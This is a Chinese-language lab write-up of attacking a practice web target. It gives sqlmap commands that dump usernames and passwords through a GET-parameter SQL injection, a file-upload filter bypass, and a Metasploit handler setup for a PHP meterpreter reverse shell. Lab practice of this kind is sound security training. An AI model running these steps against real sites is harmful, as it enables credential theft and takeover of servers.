主机:192.168.136.133
靶机:192.168.136.143
用nmap、dirb扫描靶机
web靶机系列-GET参数注入
web靶机系列-GET参数注入
发现有一个网址http://192.168.136.143/admin登陆进去,发现有登陆页面
web靶机系列-GET参数注入
试用常规的弱口令进行测试发现都不行,转换思路,看看有没有其他漏洞可入侵
用owasp-zap扫描
web靶机系列-GET参数注入
发现有sql注入
利用sqlmap -u http://192.168.136.143/cat.php?id=3 –dbs
web靶机系列-GET参数注入
有两个数据库
再用sqlmap -u http://192.168.136.143/cat.php?id=3 -D information_schema –tables查看一下information_schema,表太多,直接看下一个有什么。
web靶机系列-GET参数注入
sqlmap -u http://192.168.136.143/cat.php?id=3 -D photoblog –tables
web靶机系列-GET参数注入
看到有users的表,可能存在登陆账户和密码
sqlmap -u http://192.168.136.143/cat.php?id=3 -D photoblog -T users –columns
web靶机系列-GET参数注入
查看login和password
sqlmap -u http://192.168.136.143/cat.php?id=3 -D photoblog -T users -C “login,password” –dump
web靶机系列-GET参数注入
看到了登陆账号和密码,返回登陆页面。登陆进去,在new picture选项发现有可上传选项
web靶机系列-GET参数注入
web靶机系列-GET参数注入
接下来构造shell并写一个php文本上传
web靶机系列-GET参数注入
web靶机系列-GET参数注入
用msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.136.133
开始run监听
web靶机系列-GET参数注入
上传发现出现这个页面
web靶机系列-GET参数注入
可能被防火墙过滤,改.PHP
web靶机系列-GET参数注入
反弹shell成功
web靶机系列-GET参数注入

相关文章:

  • 2021-08-12
  • 2021-11-23
  • 2021-05-14
  • 2021-10-23
  • 2021-06-21
  • 2021-04-27
  • 2021-05-21
  • 2022-01-30
猜你喜欢
  • 2021-11-12
  • 2021-09-04
  • 2021-06-06
  • 2021-04-15
  • 2021-12-02
  • 2021-05-14
  • 2021-05-17
相关资源
相似解决方案